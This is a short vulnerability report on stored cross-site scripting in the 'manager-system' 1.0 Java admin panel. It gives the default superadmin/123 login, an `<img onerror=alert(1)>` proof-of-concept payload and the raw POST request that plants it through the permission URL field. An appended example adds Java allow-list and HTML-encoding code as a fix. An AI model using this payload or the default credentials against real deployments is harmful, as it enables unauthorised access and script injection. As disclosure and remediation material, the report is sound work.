Code Audit:
The submitAddPermission method in src/main/java/com/zero/system/controller/PermissionController.java does not filter the passed URL parameter.
Vulnerability exploitation:
http://localhost:8080/manager/login
superadmin/123
Click to modify
Input: `<img src=x onerror=alert(1);>`
Click to modify now
Corresponding data packet:
```
POST /manager/addPermission HTTP/1.1
Host: 192.168.0.102:8080
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1CEE536BC9A3066C37AB43E0F2E59A30
Connection: close
Content-Length: 80

id=6&name=%E5%90%8E%E5%8F%B0%E4%B8%BB%E9%A1%B5&url=<img src=x onerror=alert(1);>
```
Source code name: manager-system
Source code version: 1.0
Source code download link: https://github.com/ZeroWdd/manager-system/archive/refs/heads/master.zip
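
One way to close the gap the report describes, as an added example that is not code from manager-system: an allow-list check a controller could apply to the submitted `url` value before saving it, plus HTML encoding for when the stored value is rendered. The class name `PermissionUrlGuard`, its method names and the path pattern are assumptions made for illustration.

```java
import java.util.regex.Pattern;

public class PermissionUrlGuard {
    // Assumption: a permission URL is an application-relative path such as
    // /manager/addPermission, so anything outside this character set is rejected.
    private static final Pattern SAFE_PATH = Pattern.compile("^/[A-Za-z0-9_./-]{0,254}$");

    // Allow-list check to run on the request parameter before it is persisted.
    static boolean isSafePermissionUrl(String url) {
        return url != null
                && SAFE_PATH.matcher(url).matches()
                && !url.contains("//")   // no protocol-relative or doubled separators
                && !url.contains("..");  // no parent-directory segments
    }

    // HTML-encode a value for element content or a quoted attribute.
    // Applied at render time so rows stored before the fix are also neutralised.
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String[] samples = {
            "/manager/addPermission",         // constructed: a legitimate path
            "<img src=x onerror=alert(1);>",  // the value used in the report
            "/manager/../login",              // constructed: path with a parent segment
        };
        for (String url : samples) {
            System.out.printf("%-32s accepted=%-5b rendered=%s%n",
                    url, isSafePermissionUrl(url), escapeHtml(url));
        }
    }
}
```

Validation on input and encoding on output are complementary: the first keeps new bad values out of the table, the second protects pages that display values already stored.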